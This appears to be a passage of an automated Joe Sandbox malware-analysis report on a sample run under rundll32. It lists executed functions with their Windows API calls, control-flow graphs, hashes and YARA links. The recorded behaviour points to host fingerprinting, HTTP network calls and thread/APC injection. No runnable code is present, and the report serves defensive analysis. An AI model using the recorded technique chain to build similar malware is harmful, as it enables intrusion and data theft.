1a9942ae03d 26269->26100 26269->26101 26270->26269 26271 1a9942bb4e0 RtlFreeHeap 26270->26271 26271->26269 26273 1a994297885 26272->26273 26274 1a99429788a InternetOpenW 26272->26274 26273->26274 26275 1a994297898 InternetConnectW 26274->26275 26276 1a994297aed 26274->26276 26275->26276 26277 1a9942978dd HttpOpenRequestW 26275->26277 26278 1a994297b0e InternetCloseHandle 26276->26278 26281 1a994297b17 26276->26281 26277->26276 26280 1a994297931 26277->26280 26278->26281 26279 1a994297b60 26279->26148 26280->26276 26283 1a9942979cb HttpSendRequestA 26280->26283 26281->26279 26282 1a994297b56 26281->26282 26286 1a994297b8c 26281->26286 26282->26279 26284 1a9942bb4e0 RtlFreeHeap 26282->26284 26283->26276 26285 1a9942979e4 26283->26285 26284->26279 26290 1a9942bb4e0 RtlFreeHeap 26285->26290 26295 1a994297a24 26285->26295 26287 1a99429a050 RtlFreeHeap 26286->26287 26288 1a994297ba4 26287->26288 26289 1a9942bb4e0 RtlFreeHeap 26288->26289 26289->26279 26290->26295 26291 1a994297a3f InternetQueryDataAvailable 26292 1a994297ae3 26291->26292 26291->26295 26293 1a9942bb4e0 RtlFreeHeap 26292->26293 26293->26276 26294 1a994297a98 RtlReAllocateHeap 26294->26295 26295->26291 26295->26292 26295->26294 26306 1a9942917f5 26296->26306 26297 1a99429180f 26298 1a9942bb4e0 RtlFreeHeap 26297->26298 26299 1a994291820 26298->26299 26300 1a9942bb4e0 RtlFreeHeap 26299->26300 26302 1a994291838 26300->26302 26301 1a9942bb4e0 RtlFreeHeap 26301->26302 26302->26301 26303 1a99429a050 RtlFreeHeap 26302->26303 26304 1a994291b61 26302->26304 26303->26302 26304->26158 26306->26297 26309 1a994294cd0 26306->26309 26307->26148 26308->26172 26310 1a9942c4360 NtCreateThreadEx 26309->26310 26311 1a994294d3d 26310->26311 26312 1a9942c4ff0 NtQueueApcThread 26311->26312 26313 1a994294d58 26312->26313 26313->26306 26314 1a994291600 26316 1a99429162c 26314->26316 26315 1a994291792 RtlExitUserThread 26316->26315 26323 1a9942c3ba0 26316->26323 26318 1a994291717 26329 1a9942a9830 26318->26329 26320 1a994291735 26321 1a9942bb4e0 RtlFreeHeap 26320->26321 26322 1a99429173d 26321->26322 26322->26315 26324 1a9942c3bc7 26323->26324 26325 1a9942c3bd8 26323->26325 26333 1a9942c3cd0 RtlFreeHeap 26324->26333 26327 1a9942c3c87 26325->26327 26334 1a9942c3cd0 RtlFreeHeap 26325->26334 26327->26318 26331 1a9942a984d 26329->26331 26330 1a9942a9886 26331->26330 26332 1a9942adfc0 RtlFreeHeap 26331->26332 26332->26330 26333->26325 26334->26327

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 000001A9942B4D00 Relevance: 10.8, APIs: 7, Instructions: 282COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 93 1a9942b4d00-1a9942b4daf GetUserNameW GetComputerNameExW 94 1a9942b4db1-1a9942b4dc1 call 1a9942bb4c0 93->94 95 1a9942b4dc7-1a9942b4df1 GetComputerNameExW call 1a9942c4ad0 93->95 94->95 100 1a9942b4df3-1a9942b4e1a GetTokenInformation 95->100 101 1a9942b4e58-1a9942b4e92 call 1a9942c2750 call 1a9942adfc0 95->101 102 1a9942b4e1c-1a9942b4e28 100->102 103 1a9942b4e4e-1a9942b4e53 call 1a9942c4000 100->103 115 1a9942b4e94-1a9942b4ea5 call 1a9942c3de0 101->115 116 1a9942b4eaa-1a9942b4ed1 GetNativeSystemInfo 101->116 104 1a9942b4e2a-1a9942b4e39 call 1a9942c3de0 102->104 105 1a9942b4e3e-1a9942b4e49 call 1a9942c3de0 102->105 103->101 104->105 105->103 115->116 118 1a9942b4ed3-1a9942b4ee6 116->118 119 1a9942b4ee8-1a9942b4eec 116->119 120 1a9942b4f01-1a9942b4f15 call 1a9942c3de0 118->120 121 1a9942b4f17-1a9942b4f2d call 1a9942c3de0 119->121 122 1a9942b4eee-1a9942b4efd 119->122 126 1a9942b4f32-1a9942b4f42 120->126 121->126 122->120 128 1a9942b4f44-1a9942b4f84 call 1a9942c3b90 call 1a9942c3de0 call 1a9942c3b90 * 2 126->128 129 1a9942b4f89-1a9942b4fb9 GetAdaptersInfo 126->129 128->129 134 1a9942b4fbb-1a9942b4fdc call 1a9942bb4e0 * 2 129->134 135 1a9942b4fdd-1a9942b4fe3 129->135 135->134 138 1a9942b4fe5-1a9942b4ffd call 1a9942bb4c0 GetAdaptersInfo 135->138 138->134 145 1a9942b4fff-1a9942b500c 138->145 148 1a9942b5012-1a9942b5015 145->148 148->134 149 1a9942b5017-1a9942b5018 148->149 150 1a9942b501f-1a9942b5031 call 1a9942993e0 149->150 153 1a9942b5033-1a9942b5043 call 1a9942c3de0 150->153 154 1a9942b5045-1a9942b504c 150->154 153->150 154->134 156 1a9942b5052-1a9942b5062 call 1a9942c3de0 154->156 156->148
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1596153048-0
                                                                                                                                                            • Opcode ID: 1eee0c0a9b319af5417ccbe6dbfc05b107635735a379de9398a58504e28da6b6
                                                                                                                                                            • Instruction ID: fbb4bf7e52ff4ff5f7457230d651e672307932e7ac3a475b84b499cfa756fe50
                                                                                                                                                            • Opcode Fuzzy Hash: 1eee0c0a9b319af5417ccbe6dbfc05b107635735a379de9398a58504e28da6b6
                                                                                                                                                            • Instruction Fuzzy Hash: 02A1D434318B449FEB55AB14D8567DFB3E1FBC6304F40452DE84AC3292DA75A985CB83
                                                                                                                                                            Function 00007DF4BD330100 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000003.2308001256.00007DF4BD330000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4BD330000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_3_7df4bd330000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateSnapshotToolhelp32
                                                                                                                                                            • String ID: @
                                                                                                                                                            • API String ID: 3332741929-2766056989
                                                                                                                                                            • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                                            • Instruction ID: b7286ad79d6a077586b3ac9166426be3c0dc1b12a8e16f54a190d9b9253285de
                                                                                                                                                            • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                                            • Instruction Fuzzy Hash: E071CF3161494C8FEB94EF5CC898BA977F1FB98325F104226E81EC72A1DB749954CB80
                                                                                                                                                            Function 000000018001F790 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 207 18001f790-18001f7a1 208 18001f7a3-18001f7b0 OutputDebugStringA 207->208 209 18001f7b6-18001f7bd 207->209 208->209 210 18001f80f-18001f819 209->210 211 18001f7bf-18001f7c1 209->211 212 18001f7c3 call 18001f5c0 211->212 213 18001f7cc-18001f7de ActivateActCtx 211->213 216 18001f7c8-18001f7ca 212->216 213->210 215 18001f7e0-18001f7ec GetLastError 213->215 217 18001f805 215->217 218 18001f7ee-18001f7f1 215->218 216->213 216->215 217->210 218->217 219 18001f7f3-18001f7f6 218->219 219->217 220 18001f7f8-18001f7fb 219->220 220->217 221 18001f7fd-18001f804 220->221
                                                                                                                                                            APIs
                                                                                                                                                            • OutputDebugStringA.KERNEL32(?,?,00000000,000000018001F860,?,?,?,?,?,00000001800010A6), ref: 000000018001F7AA
                                                                                                                                                            • ActivateActCtx.KERNEL32(?,?,00000000,000000018001F860,?,?,?,?,?,00000001800010A6), ref: 000000018001F7D6
                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000,000000018001F860,?,?,?,?,?,00000001800010A6), ref: 000000018001F7E0
                                                                                                                                                            Strings
                                                                                                                                                            • IsolationAware function called after IsolationAwareCleanup, xrefs: 000000018001F7A3
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ActivateDebugErrorLastOutputString
                                                                                                                                                            • String ID: IsolationAware function called after IsolationAwareCleanup
                                                                                                                                                            • API String ID: 2396347390-2690750368
                                                                                                                                                            • Opcode ID: aaf881318e1cbf80df7b3db725b15d009ca645997f292fdca4c234dcf6e98535
                                                                                                                                                            • Instruction ID: 713b0fca42d5e28324eac017ae06fe03b4fcbb217fb76e539ab89f48cb609f07
                                                                                                                                                            • Opcode Fuzzy Hash: aaf881318e1cbf80df7b3db725b15d009ca645997f292fdca4c234dcf6e98535
                                                                                                                                                            • Instruction Fuzzy Hash: 3D01DE70600D0E86FBF7976198883F913D1AB5D7A4F59D011E915C63A0EF38CACD8710
                                                                                                                                                            Function 000001A994291600 Relevance: 1.7, APIs: 1, Instructions: 169threadCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExitThreadUser
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3424019298-0
                                                                                                                                                            • Opcode ID: 7ef7c9c0f28628f573ade4330c203e0d9ad1a1cad18026d23a2ad19552d955a8
                                                                                                                                                            • Instruction ID: 67271a7afcf94f963a54fdf7250754df8e515e29cb0fd3d3f38a02f510ca346d
                                                                                                                                                            • Opcode Fuzzy Hash: 7ef7c9c0f28628f573ade4330c203e0d9ad1a1cad18026d23a2ad19552d955a8
                                                                                                                                                            • Instruction Fuzzy Hash: A851D578208A085FFB59EF28D8557FA77E1FB96315F10015DE496C32A3CA29E842CB46
                                                                                                                                                            Function 000001A99429CCE0 Relevance: 1.6, APIs: 1, Instructions: 114libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProcedure
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3653107232-0
                                                                                                                                                            • Opcode ID: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                                                                                                            • Instruction ID: c68341b149684bfdcc62a3df4b8fef6578700a5439703b95bbf751bd7f148924
                                                                                                                                                            • Opcode Fuzzy Hash: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                                                                                                            • Instruction Fuzzy Hash: 5231C635218B085BDB649F09DC467FBB7E0FB86315F54061EE586C3252D630A88587D7
                                                                                                                                                            Function 000001A9942917B0 Relevance: .4, Instructions: 355COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 441 1a9942917b0-1a9942917f1 442 1a9942917f5-1a994291800 441->442 443 1a994291802-1a99429180d 442->443 444 1a99429184b-1a994291879 call 1a9942c1270 call 1a9942bb4c0 * 2 442->444 443->442 445 1a99429180f-1a994291846 call 1a9942bb4e0 * 2 443->445 444->443 457 1a99429187b-1a99429187e 444->457 456 1a994291b05-1a994291b09 445->456 458 1a994291b13-1a994291b29 456->458 459 1a994291b0b-1a994291b0e call 1a9942bb4e0 456->459 457->443 460 1a994291880-1a99429189f 457->460 464 1a994291b2b-1a994291b4a call 1a9942c3b80 call 1a99429a050 call 1a9942bb4e0 458->464 465 1a994291b4f-1a994291b5f 458->465 459->458 463 1a9942918a1-1a9942918a3 460->463 466 1a9942918e4-1a9942918f1 call 1a9942c1270 463->466 467 1a9942918a5-1a9942918b9 463->467 464->465 465->456 477 1a994291b61-1a994291b71 465->477 466->443 478 1a9942918f7-1a99429191c 466->478 467->463 469 1a9942918bb-1a9942918be 467->469 472 1a9942918c0-1a9942918c5 469->472 472->466 476 1a9942918c7-1a9942918e2 472->476 476->472 480 1a994291920-1a994291935 call 1a99429a130 478->480 484 1a994291aec-1a994291afa 480->484 485 1a99429193b-1a994291940 480->485 484->480 488 1a994291b00 484->488 486 1a994291946-1a994291955 485->486 487 1a994291a3c-1a994291a88 call 1a9942c4070 call 1a994294cd0 485->487 489 1a994291957 486->489 490 1a99429195d-1a99429196d 486->490 487->484 499 1a994291a8a-1a994291a9e 487->499 488->443 489->490 495 1a994291973-1a994291976 490->495 497 1a994291988-1a994291a37 call 1a9942c4070 call 1a9942c4000 495->497 498 1a994291978-1a994291986 495->498 497->484 498->495 498->497 503 1a994291ab0-1a994291ac5 499->503 504 1a994291aa0-1a994291aa7 call 1a9942c4000 499->504 503->499 509 1a994291ac7-1a994291ae4 call 1a9942c4000 * 2 503->509 507 1a994291aac-1a994291aae 504->507 507->484 509->484
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9f958fde5604c076024f77fc276f6f63da56de6ef62a7af64c63c1b26a7c9fd3
                                                                                                                                                            • Instruction ID: 8e992df2d43ccb698f0484e2f11a014ea302c41730f20a004cc5f8b4e595baca
                                                                                                                                                            • Opcode Fuzzy Hash: 9f958fde5604c076024f77fc276f6f63da56de6ef62a7af64c63c1b26a7c9fd3
                                                                                                                                                            • Instruction Fuzzy Hash: E3C1F538218A499FFB56EF18C8557EAB7E1FB96305F50026DE48AC3293DB74D881C742
                                                                                                                                                            Function 000001A9942C4360 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 246b04183441d9db0d4c236240df2ca26f18e78107733016fa740d2a375581b5
                                                                                                                                                            • Instruction ID: 15d2818b13329e437f8826bfb18fddb7fb24ee8a11f16d4540466568bb50cedd
                                                                                                                                                            • Opcode Fuzzy Hash: 246b04183441d9db0d4c236240df2ca26f18e78107733016fa740d2a375581b5
                                                                                                                                                            • Instruction Fuzzy Hash: D1414C7161CB489FE7749F08A8427EAB7E0FBC9725F10491FD5C983252D632A4828BC3
                                                                                                                                                            Function 000001A9942C45F0 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7425b9f205f2e48f6743ce85b3d4803992b94f2dd7c42288ff67dbf43d2a16d5
                                                                                                                                                            • Instruction ID: e99cfa04b10d6af2ffe7fd35fe38eba7c7e721110b3ce1d0ddd1e3f1aa8b78d8
                                                                                                                                                            • Opcode Fuzzy Hash: 7425b9f205f2e48f6743ce85b3d4803992b94f2dd7c42288ff67dbf43d2a16d5
                                                                                                                                                            • Instruction Fuzzy Hash: D7217C7065AB44ABE764DB0898467EBB7E4FBC9726F20091FE848C3261D6359480CB83
                                                                                                                                                            Function 000001A9942C3F40 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 38f81910f3a60e41c97a405c41efcb50c28e990bd7599c8c7593531c701bee66
                                                                                                                                                            • Instruction ID: 6c923e8bb2a2798769d5a69a04827282138fb67ee93488ee4f9dfe8abe384183
                                                                                                                                                            • Opcode Fuzzy Hash: 38f81910f3a60e41c97a405c41efcb50c28e990bd7599c8c7593531c701bee66
                                                                                                                                                            • Instruction Fuzzy Hash: 2811A23061DB44AFE7549B08A8467EBB7E0FB99325F10491FE489C2251D67694C08B83
                                                                                                                                                            Function 000001A9942C4BE0 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4459b4d784854b5074084b1eb2e58009c50c2c7bf0fd286647bf740f6eacac18
                                                                                                                                                            • Instruction ID: 7bcb1b9db1291e59e8b380f483ff5a568903acfc1e816db94de1b8256f8c23e6
                                                                                                                                                            • Opcode Fuzzy Hash: 4459b4d784854b5074084b1eb2e58009c50c2c7bf0fd286647bf740f6eacac18
                                                                                                                                                            • Instruction Fuzzy Hash: 8911C43065DB499FEB64DF4898477AB73D4FB8931AF40051EE849C22A1D776A880CB83
                                                                                                                                                            Function 000001A9942A7A50 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 5bb11d53fe8240a521e5f77f5ce288efeffd0a38eebd87c38d9030f26bb6a810
                                                                                                                                                            • Instruction ID: e319433411af2386268c5db05196040c2a00bbdec472bc768ff99ffd10b65682
                                                                                                                                                            • Opcode Fuzzy Hash: 5bb11d53fe8240a521e5f77f5ce288efeffd0a38eebd87c38d9030f26bb6a810
                                                                                                                                                            • Instruction Fuzzy Hash: 44110138219B487BF7659A5884463FFB2C0F7CA318F50051DED89822C3DBB596C88643
                                                                                                                                                            Function 000001A9942C4FF0 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a3b493b046dda1831e3ac93b31f1d57d2ffdedc147415695421c0937c946fff3
                                                                                                                                                            • Instruction ID: 1a1c0441a1a726ac3ea96985857c90db5f5b09e72ad3aee227bd0bc616be3d59
                                                                                                                                                            • Opcode Fuzzy Hash: a3b493b046dda1831e3ac93b31f1d57d2ffdedc147415695421c0937c946fff3
                                                                                                                                                            • Instruction Fuzzy Hash: 3011A334659B499FEB189F089846BEA77E0FB9D716F40085EE849C2291D676D8C0CAC3
                                                                                                                                                            Function 000001A9942C4740 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c6c2dce99591ed636752d02e92fb4e83679b8b4534c19c070d62bd12e62a70ad
                                                                                                                                                            • Instruction ID: c32fa2c0869ebe0814ff9bc5f39e3a4a74a68c45b6573b7b5c9c50aee7cdf668
                                                                                                                                                            • Opcode Fuzzy Hash: c6c2dce99591ed636752d02e92fb4e83679b8b4534c19c070d62bd12e62a70ad
                                                                                                                                                            • Instruction Fuzzy Hash: 3701D6347A9B059FFB58AB1894033FB73E1F7CA715F10455EE449C3692DA36D9808A83
                                                                                                                                                            Function 000001A99428D250 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000003.1480402796.000001A994250000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A994250000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_3_1a994250000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: d7e753f29fc521fa2d0b6c7a6994e588844e22f1070003091da851a212630d82
                                                                                                                                                            • Instruction ID: 115de0f3415d575222255266e9b7011755b12a1ba9e5e7c09815cf242aa3d696
                                                                                                                                                            • Opcode Fuzzy Hash: d7e753f29fc521fa2d0b6c7a6994e588844e22f1070003091da851a212630d82
                                                                                                                                                            • Instruction Fuzzy Hash: 3BF0A470628B408BE744DF1884C967A77E1FBD8755F24452EF889C7361CB31A882CB43
                                                                                                                                                            Function 000001A99428D2C0 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000003.1480402796.000001A994250000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A994250000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_3_1a994250000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c03d8a45eb9b0d3ccc835ff03553e770b46152858ebd01b16508ffef1a6f20c3
                                                                                                                                                            • Instruction ID: 0cb7f29cde96cbfe2acf02ce878ab954ca2e6adbcfd1ad62cf422a9ad3627953
                                                                                                                                                            • Opcode Fuzzy Hash: c03d8a45eb9b0d3ccc835ff03553e770b46152858ebd01b16508ffef1a6f20c3
                                                                                                                                                            • Instruction Fuzzy Hash: EDF05474B24F444BDB04AF2C884A67977D1F7E8755F54462EE448C7361DB35E4828B43
                                                                                                                                                            Function 000001A9942A8149 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3a87759f1dbb7da0b31a2215c550786eb7d616866bd4ea5bb0906d9c5e547a0c
                                                                                                                                                            • Instruction ID: 9a99840d0ae1ecfbecb7e83bc888f8ffaed6708ce6bfaf46668f7abed0200223
                                                                                                                                                            • Opcode Fuzzy Hash: 3a87759f1dbb7da0b31a2215c550786eb7d616866bd4ea5bb0906d9c5e547a0c
                                                                                                                                                            • Instruction Fuzzy Hash: F9D0A77258DB284DE7209A98F4433E9F3D0F781328F40442EC18CC1043D63F40864707
                                                                                                                                                            Function 000000018001F5C0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93libraryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastModule$ActivateCreateDeactivateFileFindHandleLibraryLoadNameQuerySectionString
                                                                                                                                                            • String ID: Comctl32.dll$p
                                                                                                                                                            • API String ID: 550771814-195350848
                                                                                                                                                            • Opcode ID: 34a2f0dbdd0e6ac07f7eb668994bf4ee3323e02dc5c56a4663ff06c3d7fa56c0
                                                                                                                                                            • Instruction ID: 3af2e9fca6f2b8a444c29f43d75c3359d6cbe81a64a43693d8330885b9170935
                                                                                                                                                            • Opcode Fuzzy Hash: 34a2f0dbdd0e6ac07f7eb668994bf4ee3323e02dc5c56a4663ff06c3d7fa56c0
                                                                                                                                                            • Instruction Fuzzy Hash: C4413231218F4886F7A19B15F4983EA73A5F749BA4F908225E69D427E4DF7DC64CCB00
                                                                                                                                                            Function 000001A994297830 Relevance: 10.8, APIs: 7, Instructions: 340networkmemoryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
